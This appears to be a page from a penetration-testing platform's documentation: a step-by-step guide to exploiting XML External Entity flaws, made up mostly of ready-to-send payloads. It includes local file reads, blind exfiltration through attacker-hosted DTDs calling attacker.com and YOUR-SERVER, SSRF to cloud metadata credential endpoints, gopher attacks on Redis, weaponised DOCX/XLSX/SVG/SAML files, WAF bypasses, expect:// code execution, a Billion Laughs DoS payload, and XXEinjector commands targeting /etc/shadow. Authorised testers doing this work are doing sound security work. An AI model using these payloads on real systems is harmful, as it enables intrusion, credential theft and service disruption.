Skip to main content
CWECWE-611
WSTGWSTG-INPV-07
MITRE ATT&CKT1190
CVSS Range4.3-9.1
Toolsxxeinjector
Difficulty🟡 intermediate

XML External Entity (XXE)

XXE injection targets applications that parse XML input, exploiting the XML specification's support for external entities to reference resources the server should not expose. Impact ranges from local file disclosure and SSRF to denial of service, and in rare configurations, remote code execution.

Quick Reference​

Detection priority order:

  1. Identify all XML-accepting endpoints (check Content-Type headers, SOAP/WSDL services, file upload points)
  2. Confirm entity processing with a safe internal entity test
  3. Test external entity access with an OOB callback (DNS/HTTP)
  4. Escalate to file read, SSRF, or blind exfiltration

Content-Types that signal XML parsing:

Content-TypeContext
application/xmlGeneric XML API
text/xmlLegacy XML API
application/soap+xmlSOAP services
application/xhtml+xmlXHTML documents
image/svg+xmlSVG image processing
application/rss+xmlRSS feed import
application/atom+xmlAtom feed import

Request patterns to look for:

  • POST /api/import with XML body
  • File uploads accepting .xml, .svg, .docx, .xlsx
  • SOAP endpoints at /ws/, /soap/, /service/
  • Webhook endpoints accepting text/xml
  • SAML/SSO endpoints processing XML assertions

Parser defaults by language:

LanguageParserExternal Entities Default
JavaSAXParser, DocumentBuilder, XMLReaderEnabled
PHP (<8.0)libxml2 with LIBXML_NOENTEnabled
PHP (8.0+)libxml2Disabled
Pythonlxml, xml.etreeDisabled
Pythonxml.saxMay be enabled
.NET (<4.5.2)XmlDocument, XmlTextReaderEnabled
.NET (4.5.2+)XmlDocumentDisabled
Node.jsxml2js, fast-xml-parserDisabled
RubyNokogiriDisabled
RubyREXMLMay be enabled

Read Local Files (Classic XXE)​

Start with baseline validation. Confirm the endpoint parses XML and processes entities before attempting file reads.

Step 1: Confirm XML parsing​

curl -X POST "https://TARGET/api/endpoint" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><root><item>test</item></root>'

Note the response format, status code, and any processing indicators.

Step 2: Confirm internal entity processing​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY test "ENTITY_PROCESSED">
]>
<root><item>&test;</item></root>

If the response contains ENTITY_PROCESSED, the parser expands entities. Proceed to external entities.

Step 3: Read local files​

Linux targets:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

Windows targets:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root>&xxe;</root>

Step 4: Read application-specific files​

Target configuration files for credential extraction:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">
]>
<root>&xxe;</root>

If the file contains characters that break XML parsing (angle brackets, ampersands), use the PHP base64 filter or CDATA wrapping techniques described in the Filter Bypass section.

Exfiltrate Data Blind (OOB)​

When the response does not reflect entity content, use out-of-band channels to exfiltrate data.

External DTD method​

Step 1: Host a malicious DTD on your server (evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%eval;
%exfil;

Step 2: Send the payload that loads the external DTD:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://YOUR-SERVER/evil.dtd">
%xxe;
]>
<root>test</root>

Monitor your server logs for the incoming request containing the file contents as a query parameter.

FTP exfiltration (multi-line files)​

HTTP exfiltration truncates at newlines. Use FTP for multi-line file contents.

Host this evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'ftp://YOUR-FTP-SERVER/%file;'>">
%eval;
%exfil;

Run an FTP listener on your server to capture the full file contents across multiple lines.

Base64 exfiltration (PHP targets)​

When file contents contain special characters that break the exfiltration URL:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%eval;
%exfil;

Monitor for callbacks​

After injecting the entity, poll for captured requests:

result = mcp__pter-api-server__manage_ssrf_callbacks(action="check", token=token)
# result["received"] == True means the target resolved and fetched the entity URL

Reach Internal Services (XXE to SSRF)​

Use XXE to reach internal services, cloud metadata endpoints, and private network resources.

Cloud metadata services​

AWS:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>

After retrieving the IAM role name, fetch credentials with a second request:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME">

GCP:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<root>&xxe;</root>

Azure:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
]>
<root>&xxe;</root>

Internal service access​

Probe internal services for further exploitation:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-api.local:8080/status">
]>
<root>&xxe;</root>

Use XXE SSRF to enumerate internal services and ports, then chain with vulnerabilities in those internal applications.

Gopher protocol (if supported)​

Interact with internal services using raw TCP via gopher:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "gopher://internal-server:6379/_SET%20key%20value">
]>
<root>&xxe;</root>

This can target Redis, Memcached, and other services that accept plaintext commands.

Abuse Parameter Entities​

Parameter entities (%) are processed within the DTD itself. They are your primary tool when general entities (&) are blocked.

Basic parameter entity attack​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>

Where evil.dtd contains:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?d=%data;'>">
%param1;

CDATA wrapping for in-band retrieval​

Use parameter entities to wrap file contents in CDATA so special characters do not break parsing:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://attacker.com/cdata.dtd">
%dtd;
]>
<root>&all;</root>

cdata.dtd:

<!ENTITY all "%start;%file;%end;">

This technique requires the parser to allow both external DTD loading and general entity expansion.

Exploit Local and Embedded DTDs​

Local DTD exploitation​

When external DTD loading is blocked but local file access is allowed, abuse DTD files already present on the system. You redefine a parameter entity from a local DTD to inject your payload.

Common local DTD locations:

Linux:

/usr/share/xml/fontconfig/fonts.dtd
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/sgml/docbook/xml-dtd-4.1.2/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd

Windows:

C:/Windows/System32/wbem/xml/cim20.dtd
C:/Windows/System32/wbem/xml/wmi20.dtd

Exploitation using fonts.dtd (common on Linux):

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<foo>test</foo>

The technique works by:

  1. Loading a local DTD that defines a parameter entity (e.g., %expr)
  2. Redefining that entity to contain your malicious XXE payload
  3. The redefined entity is processed when %local_dtd expands, triggering file read or exfiltration

Generic template -- adapt to any local DTD with a known entity name X:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///path/to/local.dtd">
<!ENTITY % X 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; exfil SYSTEM &#x27;http://YOUR-SERVER/?d=&#x25;file;&#x27;>">
&#x25;eval;
&#x25;exfil;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<foo>test</foo>

XXE via file formats (SVG, DOCX, XLSX)​

SVG files:

Many applications process SVG server-side for resizing or conversion. Create xxe.svg:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
<text x="10" y="20">&xxe;</text>
</svg>

Upload and check if file contents appear in the rendered image or error messages.

DOCX files (Office Open XML):

Office documents are ZIP archives containing XML files.

  1. Extract a legitimate DOCX: unzip legitimate.docx -d docx_contents/
  2. Inject entity into word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE document [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p><w:r><w:t>&xxe;</w:t></w:r></w:p>
</w:body>
</w:document>
  1. Repackage: cd docx_contents && zip -r ../malicious.docx * && cd ..

XLSX files:

Inject into xl/worksheets/sheet1.xml or xl/sharedStrings.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE worksheet [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData>
<row>
<c t="inlineStr"><is><t>&xxe;</t></is></c>
</row>
</sheetData>
</worksheet>

XXE in SOAP requests​

SOAP services are prime XXE targets:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetUser>
<username>&xxe;</username>
</GetUser>
</soap:Body>
</soap:Envelope>

XXE in RSS/Atom feeds​

If the application imports external feeds:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<rss version="2.0">
<channel>
<title>&xxe;</title>
<link>http://example.com</link>
<description>Test</description>
</channel>
</rss>

SAML-specific XXE​

SAML responses are XML documents and may be vulnerable:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">&xxe;</saml:Issuer>
</samlp:Response>

Extract Data via Error Messages​

Extract data through parser error messages when both in-band reflection and outbound connections are blocked.

Basic error-based extraction​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<root>test</root>

This triggers an error like: File not found: /nonexistent/root:x:0:0:root:/root:/bin/bash... -- the file contents appear in the error message.

Java-specific error-based XXE​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'jar:file:///nonexistent!/%file;'>">
%eval;
%error;
]>
<root>test</root>

Switch Content-Type to XML​

Many endpoints that accept JSON also accept XML when you change the Content-Type header. Always test this.

Original JSON request:

curl -X POST "https://TARGET/api/data" \
-H "Content-Type: application/json" \
-d '{"name": "test"}'

Switch to XML:

curl -X POST "https://TARGET/api/data" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><name>&xxe;</name></root>'

Map the JSON field names to XML element names. If the endpoint processes the XML, you have an XXE attack surface that was invisible from the normal API documentation.

Also test these Content-Type variations:

  • text/xml
  • application/xml;charset=UTF-8
  • application/xhtml+xml

Bypass Filters and WAFs​

WAF evasion techniques​

HTML entity encoding:

<!ENTITY xxe SYSTEM "file:&#x2f;&#x2f;&#x2f;etc/passwd">

Parameter entity construction (split the protocol handler):

<!ENTITY % p1 "fi">
<!ENTITY % p2 "le:">
<!ENTITY % p3 "///etc/passwd">
<!ENTITY % full "%p1;%p2;%p3;">

UTF-16 encoding:

<?xml version="1.0" encoding="UTF-16"?>

Convert the entire payload to UTF-16 to bypass WAF rules that only inspect UTF-8.

Incomplete remediation bypasses​

When testing a parser that has been partially hardened, try these bypasses:

Incomplete FixBypass
Only blocks SYSTEM keywordUse PUBLIC entities instead
Only blocks http:// protocolTry file://, netdoc://, jar://, gopher://
Only checks DOCTYPE at document startNested XML in CDATA, XML in headers
Blocks external DTD but not parameter entitiesInline parameter entity tricks
Input validation on specific fields onlyFind unvalidated XML input points
Blocks general entitiesParameter entities may still work

Protocol alternatives​

Java netdoc protocol (alternative to file://):

<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">

Java jar protocol (triggers SSRF during JAR download):

<!ENTITY xxe SYSTEM "jar:http://attacker.com/payload.jar!/file.txt">

PHP expect wrapper (RCE if expect extension is loaded):

<!ENTITY xxe SYSTEM "expect://id">

PHP filter chains (base64 encode to handle binary/special characters):

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

Billion Laughs (Entity Expansion DoS)​

Only use this for denial-of-service testing with explicit authorization.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

This expands to roughly 10^9 copies of "lol" consuming gigabytes of memory. Confirm explicit DoS testing authorization before sending this payload.

Build a Proof of Concept​

When building proof-of-concept demonstrations:

  1. Start safe. Use OOB detection (manage_ssrf_callbacks MCP tool) before attempting file reads. Confirm entity processing with an internal entity before escalating.

  2. Read non-sensitive files first. Demonstrate with /etc/passwd (Linux) or c:/windows/win.ini (Windows) -- files that prove access without exposing real secrets.

  3. Document the full chain. Record:

    • The exact endpoint URL and HTTP method
    • Request headers (especially Content-Type)
    • The payload sent
    • The response or OOB callback proving exploitation
    • The parser behavior observed (which entity types work, which protocols are accessible)
  4. For blind XXE, capture:

    • The manage_ssrf_callbacks interaction showing the callback (use action="get_requests")
    • The DTD file hosted on your server
    • The exfiltrated data received at your server
  5. For file upload XXE, document:

    • The original file format (SVG, DOCX, XLSX)
    • Which XML file inside the archive was modified
    • How the application processes the uploaded file (preview, import, conversion)
  6. Demonstrate real impact. After confirming basic file read, escalate to reading application configuration files, cloud metadata, or internal service responses to demonstrate business impact.

Tools​

manage_ssrf_callbacks (MCP tool): Use the built-in callback service to detect blind XXE via HTTP callbacks. Self-hosted, private, and integrated with the platform.

# Create a callback for OOB XXE detection
result = mcp__pter-api-server__manage_ssrf_callbacks(action="create")
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://CALLBACK_URL/xxe_test">
]>
<root>&xxe;</root>
# Check for callbacks
mcp__pter-api-server__manage_ssrf_callbacks(action="check", token=result["token"])
mcp__pter-api-server__manage_ssrf_callbacks(action="get_requests", token=result["token"])

XXEinjector:

Automates XXE exploitation including blind OOB techniques.

# Direct file read with OOB
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/vulnerable/endpoint --oob=http

# HTTPS target
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/vulnerable/endpoint --ssl

# PHP filter encoding
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/endpoint --phpfilter

# With proxy (route through Burp)
ruby XXEinjector.rb --host=attacker.com --file=/etc/passwd \
--path=/endpoint --proxy=127.0.0.1:8080

# Enumerate multiple files
ruby XXEinjector.rb --host=attacker.com \
--file=/etc/passwd,/etc/shadow,/app/config.xml \
--path=/endpoint --oob=http

Manual curl testing:

# Save payload to file for clean testing
cat > xxe_payload.xml << 'EOF'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
EOF

curl -X POST "https://TARGET/api/parse" \
-H "Content-Type: application/xml" \
-d @xxe_payload.xml

DTD hosting for blind XXE:

Host your malicious DTD on a server you control. A simple Python HTTP server works:

# On your server
python3 -m http.server 8080
# Place evil.dtd in the serving directory

Ensure your server is reachable from the target. If the target has egress filtering, try DNS exfiltration or error-based techniques instead.

Prioritization​

Test these first (highest real-world exploitability)​

  1. XXE on SOAP/XML API endpoints -- EPSS >0.6 for XXE CVEs. SOAP services and XML-RPC endpoints are the most common XXE vectors. Inject a basic external entity referencing /etc/passwd or an OOB callback.
  2. XXE via file upload (DOCX, XLSX, SVG) -- Office documents and SVG files are XML-based. Upload a crafted file with an external entity definition. Many document processing libraries parse XML without disabling external entities.
  3. XXE on Content-Type switch -- Send XML to endpoints that normally accept JSON by changing Content-Type: application/json to Content-Type: application/xml. Many frameworks auto-detect and parse XML.

Test these if time permits (lower exploitability)​

  1. Blind XXE with OOB exfiltration -- When the response does not reflect entity content, use DNS or HTTP callbacks to confirm XXE and exfiltrate data character by character via parameter entities.
  2. XXE to SSRF chaining -- Use confirmed XXE to reach internal services (cloud metadata, Redis, etc.) via http:// entities. Same targets as SSRF but through XML parsing.
  3. Billion laughs / entity expansion DoS -- Demonstrate DoS impact with recursive entity definitions. Low exploitation value but useful for impact assessment.

Skip if​

  • Application does not accept XML input in any form (no XML APIs, no XML-based file uploads, no SOAP services)
  • Application only accepts JSON with strict Content-Type validation (returns 415 for application/xml)

Note: You cannot externally verify parser configuration. Always test for XXE if the application accepts XML in any form — parser hardening must be confirmed through testing, not assumed.

Asset criticality​

Prioritize by data exposure: endpoints processing user-uploaded documents (DOCX, XLSX) > SOAP/XML-RPC APIs > configuration import features > RSS/feed processing endpoints. XXE on endpoints with access to sensitive files or internal networks is higher priority.